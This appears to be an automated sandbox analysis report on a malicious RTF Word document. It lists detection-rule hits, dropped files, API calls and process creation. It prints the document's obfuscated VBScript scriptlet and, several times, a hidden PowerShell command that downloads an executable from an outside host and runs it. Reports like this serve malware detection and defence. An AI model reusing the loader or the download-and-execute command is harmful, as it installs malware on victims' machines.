Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_004054B6

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: TEPO0015922.doc, type: SAMPLEMatched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: TEPO0015922.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8Screenshot OCR: Enable Editing to view the document. I t3 I a tE
Source: Screenshot number: 16Screenshot OCR: Enable Editing to view the document. ii: ^ Uf= a S O I @ 100% G) A GE)
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeJump to dropped file
Document contains OLE streams with names of living off the land binaries
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622809/\x1Ole10Native' : j....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT..... ...C:\8jkepaD\FZdtfhgYgeghD.scT...<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987236:execute sn556.... age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 01007840626
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622893/\x1Ole10Native' : k....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT.....6...C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD.scT.j..<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987236:execute sn556.... age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "0100784062605620861036505630846
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\file.exeJump to dropped file
Source: TEPO0015922.doc, type: SAMPLEMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: TEPO0015922.doc, type: SAMPLEMatched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: TEPO0015922.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1568, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1832, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004033B3
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,16_2_004033B3
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_0040727F9_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00406AA89_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C222889_2_73C22288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_0040727F16_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00406AA816_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_73C3228816_2_73C32288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 21_2_73BC228821_2_73BC2288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: String function: 00402C39 appears 52 times
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Roaming\file.exeProcess Stats: CPU usage > 98%
Source: libgdk_pixbuf-2.0-0.dll.9.drStatic PE information: Number of sections : 12 > 10
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: TEPO0015922.docReversingLabs: Detection: 23%
Source: TEPO0015922.docVirustotal: Detection: 42%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............p.......#.........-.......j.....p.........j.......e.....`Ig.......bw.....................Kn.......,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ...............................................................H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.!..............#G.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................ek....................................}.dw....@.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....P.......0.!..............#G.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....G.................ek.....&G.............................}.dw....P.......0.!...............,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....S.................ek.....&G.............................}.dw............0.!...............,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ek....................................}.dw....(.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............0.!....._.........................T..... .......................}.dw............ .................,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................ek....................................}.dw.... .......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....k.................ek.....&G.............................}.dw....X.......0.!...............,.....f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... .........ek.....&G.............................}.dw.... .......0.!..............#G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................ek....................................}.dw....X.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ................................................................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................!......6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k....................................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw.... .......0................!......".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k....................................}.dw....X.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............B..k....`$..............................}.dw.... .......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k....................................}.dw....X.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............B..k....`$..............................}.dw............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k....x...............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0......._.......................x....... .......................}.dw............ ...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k....p...............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............B..k....`$..............................}.dw....(.......0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k....................................}.dw....`.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.~.....w....... .......B..k....`$..............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k....................................}.dw....(.......0................!..............................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
